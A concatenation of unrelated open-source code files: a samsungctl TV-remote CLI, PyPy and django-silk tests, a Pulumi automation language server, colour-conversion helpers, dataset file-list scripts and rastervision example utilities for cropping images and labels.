doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Create a span for "<NAME>" from the doc and assign it the label "PERSON"
span = Span(doc, 2, 4, label="PERSON")
print(span.text, span.label_)
# Add the span to the doc's entities
doc.ents = [span]
# Print entities' text and labels
print([(ent.text, ent.label_) for ent in doc.ents])
|
samsungctl/__main__.py | p3g4asus/samsungctl | 135 | 11194793 | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import collections
import json
import logging
import os
import socket
import sys
try:
from . import __doc__ as doc
from . import __title__ as title
from . import __version__ as version
from . import exceptions
from . import Remote
from . import key_mappings
from .config import Config
except ValueError:
path = os.path.dirname(__file__)
if not path:
path = os.path.dirname(sys.argv[0])
if not path:
path = os.getcwd()
sys.path.insert(0, os.path.abspath(os.path.join(path, '..')))
from samsungctl import __doc__ as doc
from samsungctl import __title__ as title
from samsungctl import __version__ as version
from samsungctl import exceptions
from samsungctl import Remote
from samsungctl import key_mappings
from samsungctl.config import Config
def _read_config():
config = collections.defaultdict(
lambda: None,
dict(
name="samsungctl",
description="PC",
id="",
method="legacy",
timeout=0,
)
)
if sys.platform.startswith('win'):
return config
directories = []
xdg_config = os.getenv("XDG_CONFIG_HOME")
if xdg_config:
directories.append(xdg_config)
directories.append(os.path.join(os.getenv("HOME"), ".config"))
directories.append("/etc")
for directory in directories:
pth = os.path.join(directory, "samsungctl.conf")
if os.path.isfile(pth):
config_file = open(pth, 'r')
break
else:
return config
with config_file:
try:
config_json = json.load(config_file)
config.update(config_json)
except ValueError as e:
logging.warning("Could not parse the configuration file.\n %s", e)
return config
def keys_help(keys):
import sys
key_groups = {}
max_len = 0
if not keys or keys == [None]:
keys = key_mappings.KEYS.values()
for key in keys:
if key is None:
continue
group = key.group
key = str(key)
if group not in key_groups:
key_groups[group] = []
if key not in key_groups[group]:
key_groups[group] += [key]
max_len = max(max_len, len(key) - 4)
print('Available keys')
print('=' * (max_len + 4))
print()
print('Note: Key support depends on TV model.')
print()
for group in sorted(list(key_groups.keys())):
print(' ' + group)
print(' ' + ('-' * max_len))
print('\n'.join(key_groups[group]))
print()
sys.exit(0)
def get_key(key):
if key in key_mappings.KEYS:
return key_mappings.KEYS[key]
else:
logging.warning("Warning: Key {0} not found.".format(key))
def main():
epilog = "E.g. %(prog)s --host 192.168.0.10 --name myremote KEY_VOLDOWN"
parser = argparse.ArgumentParser(
prog=title,
description=doc,
epilog=epilog
)
parser.add_argument(
"--version",
action="version",
version="%(prog)s {0}".format(version)
)
parser.add_argument(
"-v",
"--verbose",
action="count",
help="increase output verbosity"
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="suppress non-fatal output"
)
parser.add_argument(
"-i",
"--interactive",
action="store_true",
help="interactive control"
)
parser.add_argument(
"--host",
help="TV hostname or IP address"
)
parser.add_argument(
"--token",
default=None,
help="token for TV's >= 2014"
)
parser.add_argument(
"--port",
type=int,
help="TV port number (TCP)"
)
parser.add_argument(
"--method",
help="Connection method (legacy or websocket)"
)
parser.add_argument(
"--name",
help="remote control name"
)
parser.add_argument(
"--description",
metavar="DESC",
help="remote control description"
)
parser.add_argument(
"--id",
help="remote control id"
)
parser.add_argument(
"--volume",
type=int,
default=None,
help=(
"sets the TV volume to the entered value, a value of -1 will "
"display the volume level"
)
)
parser.add_argument(
"--brightness",
type=int,
default=None,
help=(
"sets the TV brightness level to the entered value, "
"a value of -1 will display the brightness level"
)
)
parser.add_argument(
"--contrast",
type=int,
default=None,
help=(
"sets the TV contrast level to the entered value, "
"a value of -1 will display the contrast level"
)
)
parser.add_argument(
"--sharpness",
type=int,
default=None,
help=(
"sets the TV sharpness level to the entered value, "
"a value of -1 will display the sharpness level"
)
)
parser.add_argument(
"--mute",
type=str,
default=None,
choices=['off', 'on', 'state'],
help=(
"sets the mute on or off (not a toggle), "
"state displays if the mute is on or off"
)
)
parser.add_argument(
"--artmode",
type=str,
default=None,
choices=['off', 'on', 'state'],
help=(
"sets the art mode for Frame TV's, "
"state displays if the art mode is on or off"
)
)
parser.add_argument(
"--source",
type=str,
default=None,
help=(
"changes the input source to the one specified. "
"You can either enter the TV source name "
"eg: HDMI1 HDMI2, USB, PC...."
"or you can enter the programmed label for the source. "
"This is going to be what is displayed on the OSD when you change "
"the source from the remote. If you enter 'state' for the source "
"name it will print out the currently "
"active source label and name."
)
)
parser.add_argument(
"--source-label",
type=str,
default=None,
help=(
"changes the label for a source. "
"If you do not use --source to specify the source to change the "
"label on. It will automatically default to the currently "
"active source. If you set the label to 'state' it will print out "
"the current label for a source if specified using --source or "
"the currently active source"
)
)
parser.add_argument(
"--timeout",
type=float,
help="socket timeout in seconds (0 = no timeout)"
)
parser.add_argument(
"--config-file",
type=str,
default=None,
help="configuration file to load and/or save to"
)
parser.add_argument(
"--start-app",
help="start an application --start-app \"Netflix\""
)
parser.add_argument(
"--app-metadata",
help=(
"pass options string of information the application "
"can use when it starts up. And example would be the browser. "
"To have it open directly to a specific URL you would enter: "
"\"http\/\/www.some-web-address.com\". wrapping the meta data in "
"quotes will reduce the possibility of a command line parser "
"error."
)
)
parser.add_argument(
"--key-help",
action="store_true",
help="print available keys. (key support depends on tv model)"
)
parser.add_argument(
"key",
nargs="*",
default=[],
type=get_key,
help="keys to be sent (e.g. KEY_VOLDOWN)"
)
args = parser.parse_args()
if args.quiet:
log_level = logging.ERROR
elif not args.verbose:
log_level = logging.WARNING
elif args.verbose == 1:
log_level = logging.INFO
else:
log_level = logging.DEBUG
if args.key_help:
keys_help(args.key)
try:
if args.config_file is None:
config = _read_config()
config.update(
{
k: v for k, v in vars(args).items()
if v is not None
}
)
config = Config(**config)
else:
config = {
k: v for k, v in vars(args).items()
if v is not None
}
config = Config.load(args.config_file)(**config)
except exceptions.ConfigError:
import traceback
traceback.print_exc()
return
config.log_level = log_level
if config.upnp_locations is None:
config.upnp_locations = []
try:
with Remote(config) as remote:
if args.interactive:
logging.getLogger().setLevel(logging.ERROR)
from . import interactive
inter = interactive.Interactive(remote)
inter.run()
elif config.method == 'websocket' and args.start_app:
app = remote.get_application(args.start_app)
if args.app_metadata:
app.run(args.app_metadata)
else:
app.run()
else:
for key in args.key:
if key is None:
continue
key(remote)
if args.volume is not None:
if args.volume == -1:
print('Volume:', remote.volume, '%')
else:
remote.volume = args.volume
elif args.mute is not None:
if args.mute == 'state':
print('Mute:', 'ON' if remote.mute else 'OFF')
else:
remote.mute = args.mute == 'on'
elif args.artmode is not None:
if args.artmode == 'state':
print('Art Mode:', 'ON' if remote.artmode else 'OFF')
else:
remote.artmode = args.artmode == 'on'
if args.brightness is not None:
if args.brightness == -1:
print('Brightness:', remote.brightness, '%')
else:
remote.brightness = args.brightness
if args.contrast is not None:
if args.contrast == -1:
print('Contrast:', remote.contrast, '%')
else:
remote.contrast = args.contrast
if args.sharpness is not None:
if args.sharpness == -1:
print('Sharpness:', remote.sharpness, '%')
else:
remote.sharpness = args.sharpness
if args.source_label is not None:
if args.source is None:
if args.source_label == 'state':
print('Source Label:', remote.source.label)
else:
remote.source.label = args.source_label
else:
for source in remote.sources:
if args.source in (source.label, source.name):
if args.source_label == 'state':
print('Source Label:', source.label)
else:
source.label = args.source_label
break
elif args.source is not None:
if args.source == 'state':
source = remote.source
print(
'Source: Label =', source.label,
'Name =', source.name
)
else:
remote.source = args.source
except exceptions.ConnectionClosed:
logging.error("Error: Connection closed!")
except exceptions.AccessDenied:
logging.error("Error: Access denied!")
except exceptions.ConfigUnknownMethod:
logging.error("Error: Unknown method '{}'".format(config.method))
except socket.timeout:
logging.error("Error: Timed out!")
except OSError as e:
logging.error("Error: %s", e.strerror)
if args.config_file:
config.save()
if __name__ == "__main__":
main()
|
pypy/interpreter/test/test_pycode.py | nanjekyejoannah/pypy | 333 | 11194796 | <reponame>nanjekyejoannah/pypy
from pypy.interpreter.pycode import _code_const_eq
def test_strong_const_equal(space):
# test that the stronger equal that code objects are supposed to use for
# consts works
s = 'Python'
values = [
space.newint(1),
space.newfloat(0.0),
space.newfloat(-0.0),
space.newfloat(1.0),
space.newfloat(-1.0),
space.w_True,
space.w_False,
space.w_None,
space.w_Ellipsis,
space.newcomplex(0.0, 0.0),
space.newcomplex(0.0, -0.0),
space.newcomplex(-0.0, 0.0),
space.newcomplex(-0.0, -0.0),
space.newcomplex(1.0, 1.0),
space.newcomplex(1.0, -1.0),
space.newcomplex(-1.0, 1.0),
space.newcomplex(-1.0, -1.0),
space.newfrozenset(),
space.newtuple([]),
space.newutf8(s, len(s)),
space.newbytes(s),
]
for w_a in values:
assert _code_const_eq(space, w_a, w_a)
assert _code_const_eq(space, space.newtuple([w_a]),
space.newtuple([w_a]))
assert _code_const_eq(space, space.newfrozenset([w_a]),
space.newfrozenset([w_a]))
for w_a in values:
for w_b in values:
if w_a is w_b:
continue
assert not _code_const_eq(space, w_a, w_b)
assert _code_const_eq(space, space.newtuple([w_a, w_b]),
space.newtuple([w_a, w_b]))
assert not _code_const_eq(space, space.newtuple([w_a]),
space.newtuple([w_b]))
assert not _code_const_eq(space, space.newtuple([w_a, w_b]),
space.newtuple([w_b, w_a]))
assert not _code_const_eq(space, space.newfrozenset([w_a]),
space.newfrozenset([w_b]))
s1 = 'Python' + str(1) + str(1)
s2 = 'Python' + str(11)
assert _code_const_eq(space, space.newutf8(s1, len(s1)),
space.newutf8(s2, len(s2)))
assert _code_const_eq(space, space.newbytes(s1),
space.newbytes(s2))
|
hubconf.py | ijonglin/IBN-Net | 744 | 11194797 | dependencies = ['torch']
from ibnnet import resnet18_ibn_a, resnet34_ibn_a, resnet50_ibn_a, resnet101_ibn_a, \
resnet18_ibn_b, resnet34_ibn_b, resnet50_ibn_b, resnet101_ibn_b, \
resnext101_ibn_a, se_resnet101_ibn_a
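# Usage sketch (added for illustration, not part of the original hubconf): with
# this file at the repository root, the entry points above can be loaded through
# torch.hub; the repository path below is an assumption based on this fork:
#
#   import torch
#   model = torch.hub.load('ijonglin/IBN-Net', 'resnet50_ibn_a', pretrained=True)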
|
modules/dnn/feathernet/data/fileList.py | zongwave/libxcam | 400 | 11194800 |
# coding: utf-8
# # Use CASIA-SURF training dataset and our private dataset for training
# In[1]:
from pathlib import Path  # import Path from pathlib
import os
# data_dir = os.getcwd() + '/our_filelist'
# txt_dir=[i for i in list(Path(data_dir).glob("**/2*.txt")) ]#
# Use CASIA-SURF traing data and our private data
# str1 = '/home/zp/disk1T/CASIASURF/data'
# str2 = os.getcwd()
# str3 = '/home/zp/disk1T/TSNet-LW/data'
# for i in range(len(txt_dir)):
# s = str(txt_dir[i]).replace('[','').replace(']','')  # strip the brackets; these two lines are optional depending on the data
# s2 = s.replace("'",'').replace('our_filelist','')
# fp = open(s2,'w')
# with open(s,'r') as f:
# lines = f.read().splitlines()
# for i in lines:
# i = i.replace(str1,str2)
# i = i.replace(str3,str2)
# fp.write( i + '\n')
# fp.close()
# # Use CASIA-SURF Val data for val
# Use CASIA-SURF training data for training
import fileinput
rgb = open('./rgb_train.txt','a')
depth = open('./depth_train.txt','a')
ir = open('./ir_train.txt','a')
label = open('./label_train.txt','a')
pwd = os.getcwd() +'/'  # the training data path
for line in fileinput.input("train_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
import fileinput
rgb = open('./rgb_val.txt','a')
depth = open('./depth_val.txt','a')
ir = open('./ir_val.txt','a')
label = open('./label_val.txt','a')
pwd = os.getcwd() +'/'# the val data path
for line in fileinput.input("val_private_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
# Use CASIA-SURF Test data for test
# To make testing easier, we also prepare the labels for the test set.
import fileinput
rgb = open('./rgb_test.txt','a')
depth = open('./depth_test.txt','a')
ir = open('./ir_test.txt','a')
label = open('./label_test.txt','a')
pwd = os.getcwd() +'/'  # the test data path
for line in fileinput.input("test_private_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
# In the test phase, we use the IR data for training
# replace '/home/zp/disk1T/libxcam-testset/'
f = open('ir_final_train.txt','w')
ir_file = 'ir_final_train_tmp.txt'
s = '/home/zp/disk1T/libxcam-testset/data'
import os
dir_pwd = os.getcwd()
with open(ir_file,'r') as fp:
lines = fp.read().splitlines()
for line in lines:
line = line.replace(s,dir_pwd)
f.write(line + '\n')
f.close() |
ufora/core/math/Color.py | ufora/ufora | 571 | 11194851 | <gh_stars>100-1000
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
def hsl_to_rgb(h,s,l):
q = l * (1.0 + s) * (l < .5) + (l + s - l * s) * (l >= .5)
p = 2 * l - q
h = h - numpy.floor(h)
t = [h + 1.0 / 3.0, h, h - 1.0 / 3.0]
for ix in range(3):
t[ix] -= numpy.floor(t[ix])
t[ix] = ((p + 6 * (q - p) * t[ix]) * (t[ix] < 1.0 / 6.0)
+ q * (t[ix] >= 1.0 / 6.0) * (t[ix] < 3.0 / 6.0)
+ (p + 6 * (q - p) * (2.0 / 3.0 - t[ix]) ) * (t[ix] >= 3.0 / 6.0) * (t[ix] < 5.0 / 6.0)
+ p * (t[ix] >= 5.0 / 6.0))
return t[0],t[1],t[2]
def hsv_to_rgb(h,s,v):
f = (h - numpy.floor(h)) * 6.0
hi = numpy.floor(f)
f -= hi
p = v * (1 - s)
q = v * (1 - f * s)
t = v * (1 - (1 - f) * s)
hi = hi.astype(int)
r = v * (hi == 0) + q * (hi == 1) + p * (hi == 2) + p * (hi == 3) + t * (hi == 4) + v * (hi == 5)
g = t * (hi == 0) + v * (hi == 1) + v * (hi == 2) + q * (hi == 3) + p * (hi == 4) + p * (hi == 5)
b = p * (hi == 0) + p * (hi == 1) + t * (hi == 2) + v * (hi == 3) + v * (hi == 4) + q * (hi == 5)
return r,g,b
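# Usage sketch (added for illustration, not part of the original module): both
# converters operate elementwise on numpy arrays of values in [0, 1] and return
# an (r, g, b) tuple in the same range, e.g.:
#
#   h = numpy.linspace(0.0, 1.0, 8)
#   r, g, b = hsv_to_rgb(h, numpy.ones_like(h), numpy.ones_like(h))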
|
sdk/python/lib/pulumi/automation/_server.py | pcen/pulumi | 12,004 | 11194858 | <reponame>pcen/pulumi<filename>sdk/python/lib/pulumi/automation/_server.py<gh_stars>1000+
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import sys
import traceback
from contextlib import suppress
import grpc
from ._workspace import PulumiFn
from .. import log
from ..runtime.proto import language_pb2, plugin_pb2, LanguageRuntimeServicer
from ..runtime import run_in_stack, reset_options, set_all_config
from ..errors import RunError
_py_version_less_than_3_7 = sys.version_info[0] == 3 and sys.version_info[1] < 7
class LanguageServer(LanguageRuntimeServicer):
program: PulumiFn
def __init__(self, program: PulumiFn) -> None:
self.program = program # type: ignore
@staticmethod
def on_pulumi_exit():
# Reset globals
reset_options()
def GetRequiredPlugins(self, request, context):
return language_pb2.GetRequiredPluginsResponse()
def Run(self, request, context):
# Configure the runtime so that the user program hooks up to Pulumi as appropriate.
engine_address = request.args[0] if request.args else ""
reset_options(
project=request.project,
monitor_address=request.monitor_address,
engine_address=engine_address,
stack=request.stack,
parallel=request.parallel,
preview=request.dryRun
)
if request.config:
secret_keys = request.configSecretKeys if request.configSecretKeys else None
set_all_config(request.config, secret_keys)
# The strategy here is derived from sdk/python/cmd/pulumi-language-python-exec
result = language_pb2.RunResponse()
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(run_in_stack(self.program))
except RunError as exn:
msg = str(exn)
log.error(msg)
result.error = str(msg)
return result
except grpc.RpcError as exn:
# If the monitor is unavailable, it is in the process of shutting down or has already
# shut down. Don't emit an error if this is the case.
# pylint: disable=no-member
if exn.code() == grpc.StatusCode.UNAVAILABLE:
log.debug("Resource monitor has terminated, shutting down.")
else:
msg = f"RPC error: {exn.details()}"
log.error(msg)
result.error = msg
return result
except Exception as exn:
msg = str(f"python inline source runtime error: {exn}\n{traceback.format_exc()}")
log.error(msg)
result.error = msg
return result
finally:
# If there's an exception during `run_in_stack`, it may result in pending asyncio tasks remaining unresolved
# at the time the loop is closed, which results in a `Task was destroyed but it is pending!` error being
# logged to stdout. To avoid this, we collect all the unresolved tasks in the loop and cancel them before
# closing the loop.
pending = asyncio.Task.all_tasks(loop) if _py_version_less_than_3_7 else asyncio.all_tasks(loop) # pylint: disable=no-member
log.debug(f"Cancelling {len(pending)} tasks.")
for task in pending:
task.cancel()
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
loop.close()
sys.stdout.flush()
sys.stderr.flush()
return result
def GetPluginInfo(self, request, context):
return plugin_pb2.PluginInfo()
|
project/tests/test_view_sql_detail.py | eduzen/django-silk | 2,027 | 11194878 | <gh_stars>1000+
import random
from django.conf import settings
from django.test import TestCase
from silk.config import SilkyConfig
from silk.middleware import silky_reverse
from silk.views.sql_detail import SQLDetailView
from .test_lib.mock_suite import MockSuite
class TestViewSQLDetail(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
SilkyConfig().SILKY_AUTHENTICATION = False
SilkyConfig().SILKY_AUTHORISATION = False
def test_allowed_file_paths_nothing_specified(self):
"""by default we dont display any source, and it should return correctly"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
response = self.client.get(silky_reverse('request_sql_detail', kwargs={'sql_id': query.id, 'request_id': request.id}))
self.assertTrue(response.status_code == 200)
def test_allowed_file_paths_available_source(self):
"""if we request to view source that exists in the TB all should be fine"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
tb = query.traceback_ln_only
_, files = SQLDetailView()._urlify(tb)
file_path = random.choice(files)
with open(file_path) as f:
line_num = random.randint(0, len(f.read().split('\n')))
response = self.client.get(silky_reverse('request_sql_detail',
kwargs={'sql_id': query.id, 'request_id': request.id}),
data={
'line_num': line_num,
'file_path': file_path
})
self.assertTrue(response.status_code == 200)
def test_allowed_file_paths_unavailable_source(self):
"""if we request to view source that is not in the traceback we should get a 403"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
file_path = settings.TEMP_DIR + '/blah'
with open(file_path, 'w') as f:
f.write('test')
response = self.client.get(silky_reverse('request_sql_detail',
kwargs={'sql_id': query.id, 'request_id': request.id}),
data={
'line_num': 0,
'file_path': file_path
})
self.assertTrue(response.status_code == 403)
|
common/src/stack/command/stack/commands/add/host/storage/partition/__init__.py | anooprajendra/stacki | 123 | 11194887 | <gh_stars>100-1000
# @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack.commands
from stack.exception import ArgRequired
class Command(stack.commands.add.host.command):
"""
Add a storage partition configuration for the specified hosts.
<arg type='string' name='host' repeat='1' optional='0'>
Host name of machine
</arg>
<param type='string' name='device' optional='0'>
Disk device on which we are creating partitions
</param>
<param type='string' name='mountpoint' optional='1'>
Mountpoint to create
</param>
<param type='integer' name='size' optional='0'>
Size of the partition.
</param>
<param type='string' name='type' optional='1'>
Type of partition E.g: ext4, ext3, xfs, raid, etc.
</param>
<param type='string' name='options' optional='1'>
Options that need to be supplied while adding partitions.
</param>
<param type='integer' name='partid' optional='1'>
The relative partition id for this partition. Partitions will be
created in ascending partition id order.
</param>
<example cmd='add host storage partition backend-0-0 device=sda mountpoint=/var size=50 type=ext4'>
Creates an ext4 partition on device sda with mountpoint /var.
</example>
"""
def run(self, params, args):
if len(args) == 0:
raise ArgRequired(self, 'host')
self.command('add.storage.partition', self._argv + ['scope=host'], verbose_errors = False)
return self.rc
|
Server/models/live.py | qinXpeng/weapp-zhihulive | 381 | 11194907 | # coding=utf-8
from datetime import date, timedelta
from elasticsearch_dsl import (
DocType, Date, Integer, Text, Float, Boolean, Keyword, SF, Q, A,
Completion, Long)
from elasticsearch_dsl.connections import connections
from elasticsearch_dsl.analysis import CustomAnalyzer
from config import SEARCH_FIELDS, LIVE_URL
from .speaker import User, session
from .topic import Topic
connections.create_connection(hosts=['localhost'])
gauss_sf = SF('gauss', starts_at={
'origin': 'now', 'offset': '7d', 'scale': '10d'
})
log_sf = SF('script_score', script={
'lang': 'painless',
'inline': ("Math.log10(doc['seats_taken'].value * doc['amount'].value) * "
"doc['feedback_score'].value")
})
ik_analyzer = CustomAnalyzer(
'ik_analyzer', tokenizer='ik_max_word',
filter=['lowercase']
)
class Live(DocType):
id = Long()
speaker_id = Integer()
speaker_name = Text(analyzer='ik_max_word')
feedback_score = Float() # rating score
topic_names = Text(analyzer='ik_max_word') # topic tag names
seats_taken = Integer() # number of participants
subject = Text(analyzer='ik_max_word') # title
amount = Float() # price (RMB)
description = Text(analyzer='ik_max_word')
status = Boolean() # public(True)/ended(False)
starts_at = Date()
outline = Text(analyzer='ik_max_word') # Live content (outline)
speaker_message_count = Integer()
tag_names = Text(analyzer='ik_max_word')
liked_num = Integer()
topics = Keyword()
live_suggest = Completion(analyzer=ik_analyzer)
cover = Text(index='not_analyzed')
zhuanlan_url = Text(index='not_analyzed')
@property
def id(self):
return self._id
@property
def speaker(self):
return session.query(User).get(self.speaker_id)
@property
def url(self):
return LIVE_URL.format(self.id)
class Meta:
index = 'live130'
def to_dict(self, include_extended=True):
d = super().to_dict()
if include_extended:
d.update({
'id': self._id,
'type': 'live',
'speaker': self.speaker.to_dict(),
'url': self.url
})
return d
@classmethod
async def add(cls, **kwargs):
id = kwargs.pop('id', None)
if id is None:
return False
live = cls(meta={'id': int(id)}, **kwargs)
await live.save()
return live
@classmethod
async def _execute(cls, s, order_by=None):
if order_by is not None:
s = s.sort(order_by)
lives = await s.execute()
return [live.to_dict() for live in lives]
@classmethod
def apply_weight(cls, s, start, limit):
return s.query(Q('function_score', functions=[gauss_sf, log_sf])).extra(
**{'from': start, 'size': limit})
@classmethod
async def ik_search(cls, query, status=None, start=0, limit=10):
s = cls.search()
s = s.query('multi_match', query=query,
fields=SEARCH_FIELDS)
if status is not None:
s = s.query('match', status=status)
s = cls.apply_weight(s, start, limit)
return await cls._execute(s)
@classmethod
async def explore(cls, from_date=None, to_date=None, order_by=None,
start=0, limit=10, topic=None):
s = cls.search()
if topic is not None:
s = s.query(Q('term', topic_names=topic))
starts_at = {}
if from_date is not None:
starts_at['from'] = from_date
if to_date is not None:
starts_at['to'] = to_date
if starts_at:
s = s.query(Q('range', starts_at=starts_at))
if order_by is None:
s = cls.apply_weight(s, start, limit)
return await cls._execute(s, order_by)
@classmethod
async def get_hot_weekly(cls):
today = date.today()
return await cls.explore(from_date=today - timedelta(days=7),
to_date=today, limit=20)
@classmethod
async def get_hot_monthly(cls):
today = date.today()
return await cls.explore(from_date=today - timedelta(days=30),
to_date=today, limit=50)
@classmethod
async def ik_search_by_speaker_id(cls, speaker_id, order_by='-starts_at'):
s = cls.search()
s = s.query(Q('bool', should=Q('match', speaker_id=speaker_id)))
return await cls._execute(s, order_by)
@classmethod
async def get_hot_topics(cls, size=50):
s = cls.search()
s.aggs.bucket('topics', A('terms', field='topics', size=size))
rs = await s.execute()
buckets = rs.aggregations.topics.buckets
topic_names = [r['key'] for r in buckets]
topics = session.query(Topic).filter(Topic.name.in_(topic_names)).all()
topics = sorted(topics, key=lambda t: topic_names.index(t.name))
return [topic.to_dict() for topic in topics]
@classmethod
async def ik_suggest(cls, query, size=10):
s = cls.search()
s = s.suggest('live_suggestion', query, completion={
'field': 'live_suggest', 'fuzzy': {'fuzziness': 2}, 'size': size
})
suggestions = await s.execute_suggest()
matches = suggestions.live_suggestion[0].options
ids = [match._id for match in matches]
if not ids:
return []
lives = await Live.mget(ids)
return [live.to_dict() for live in lives]
async def init():
await Live.init()
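# Usage sketch (added for illustration, not part of the original module): the
# query helpers are coroutines, so inside an async context one could do, e.g.:
#
#   lives = await Live.ik_search('python', status=True)
#   hot = await Live.get_hot_weekly()
#   suggestions = await Live.ik_suggest('python')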
|
samples/wmi/create_process.py | IMULMUL/PythonForWindows | 479 | 11194920 | import time
import windows
wmispace = windows.system.wmi["root\\cimv2"]
print("WMI namespace is <{0}>".format(wmispace))
proc_class = wmispace.get_object("Win32_process")
print("Process class is {0}".format(proc_class))
inparam_cls = proc_class.get_method("Create").inparam
print("Method Create InParams is <{0}>".format(inparam_cls))
print("Method Create InParams properties are <{0}>".format(inparam_cls.properties))
print("Creating instance of inparam")
inparam = inparam_cls()
print("InParam instance is <{0}>".format(inparam))
print("Setting <CommandLine>")
inparam["CommandLine"] = r"c:\windows\system32\notepad.exe"
print("Executing method")
# This API may change for something that better wraps cls/object/Parameters handling
outparam = wmispace.exec_method(proc_class, "Create", inparam)
print("OutParams is {0}".format(outparam))
print("Out params values are: {0}".format(outparam.properties))
target = windows.WinProcess(pid=int(outparam["ProcessId"]))
print("Created process is {0}".format(target))
print("Waiting 1s")
time.sleep(1)
print("Killing the process")
target.exit(0)
|
rastervision_pytorch_backend/rastervision/pytorch_backend/examples/utils.py | theoway/raster-vision | 1,577 | 11194945 | from typing import List, Optional
import csv
from io import StringIO
import os
from pathlib import Path
from tempfile import TemporaryDirectory
import rasterio
from shapely.strtree import STRtree
from shapely.geometry import shape, mapping
from shapely.ops import transform
from rastervision.core import Box
from rastervision.core.data import (RasterioCRSTransformer,
GeoJSONVectorSourceConfig)
from rastervision.core.utils.stac import parse_stac
from rastervision.pipeline.file_system import (
file_to_str, file_exists, get_local_path, upload_or_copy, make_dir,
json_to_file, download_if_needed, unzip)
from rastervision.aws_s3 import S3FileSystem
def str_to_bool(x):
if type(x) == str:
if x.lower() == 'true':
return True
elif x.lower() == 'false':
return False
else:
raise ValueError('{} is expected to be true or false'.format(x))
return x
def get_scene_info(csv_uri):
csv_str = file_to_str(csv_uri)
reader = csv.reader(StringIO(csv_str), delimiter=',')
return list(reader)
def crop_image(image_uri, window, crop_uri):
im_dataset = rasterio.open(image_uri)
rasterio_window = window.rasterio_format()
im = im_dataset.read(window=rasterio_window)
with TemporaryDirectory() as tmp_dir:
crop_path = get_local_path(crop_uri, tmp_dir)
make_dir(crop_path, use_dirname=True)
meta = im_dataset.meta
meta['width'], meta['height'] = window.get_width(), window.get_height()
meta['transform'] = rasterio.windows.transform(rasterio_window,
im_dataset.transform)
with rasterio.open(crop_path, 'w', **meta) as dst:
dst.colorinterp = im_dataset.colorinterp
dst.write(im)
upload_or_copy(crop_path, crop_uri)
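# Illustrative sketch (URIs are hypothetical, not from the original file):
# cropping the top-left 512x512 window of a scene with the helper above.
#
#   window = Box(0, 0, 512, 512)
#   crop_image('s3://bucket/scene.tif', window, 's3://bucket/scene_crop.tif')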
def save_image_crop(image_uri,
image_crop_uri,
label_uri=None,
label_crop_uri=None,
size=600,
min_features=10,
vector_labels=True,
class_config=None):
"""Save a crop of an image to use for testing.
    If label_uri is set, the crop must contain at least min_features features.
Args:
image_uri: URI of original image
image_crop_uri: URI of cropped image to save
label_uri: optional URI of label file
label_crop_uri: optional URI of cropped labels to save
size: height and width of crop
Raises:
        ValueError: if a crop satisfying the min_features constraint cannot be found.
"""
if not file_exists(image_crop_uri):
print('Saving test crop to {}...'.format(image_crop_uri))
old_environ = os.environ.copy()
try:
request_payer = S3FileSystem.get_request_payer()
if request_payer == 'requester':
os.environ['AWS_REQUEST_PAYER'] = request_payer
im_dataset = rasterio.open(image_uri)
h, w = im_dataset.height, im_dataset.width
extent = Box(0, 0, h, w)
windows = extent.get_windows(size, size)
if label_uri and vector_labels:
crs_transformer = RasterioCRSTransformer.from_dataset(
im_dataset)
geojson_vs_config = GeoJSONVectorSourceConfig(
uri=label_uri, default_class_id=0, ignore_crs_field=True)
vs = geojson_vs_config.build(class_config, crs_transformer)
geojson = vs.get_geojson()
geoms = []
for f in geojson['features']:
g = shape(f['geometry'])
geoms.append(g)
tree = STRtree(geoms)
def p2m(x, y, z=None):
return crs_transformer.pixel_to_map((x, y))
for w in windows:
use_window = True
if label_uri and vector_labels:
w_polys = tree.query(w.to_shapely())
use_window = len(w_polys) >= min_features
if use_window and label_crop_uri is not None:
print('Saving test crop labels to {}...'.format(
label_crop_uri))
label_crop_features = [
mapping(transform(p2m, wp)) for wp in w_polys
]
label_crop_json = {
'type':
'FeatureCollection',
'features': [{
'geometry': f
} for f in label_crop_features]
}
json_to_file(label_crop_json, label_crop_uri)
if use_window:
crop_image(image_uri, w, image_crop_uri)
if not vector_labels and label_uri and label_crop_uri:
crop_image(label_uri, w, label_crop_uri)
break
if not use_window:
raise ValueError('Could not find a good crop.')
finally:
os.environ.clear()
os.environ.update(old_environ)
def read_stac(uri: str, unzip_dir: Optional[str] = None) -> List[dict]:
"""Parse the contents of a STAC catalog (downloading it first, if
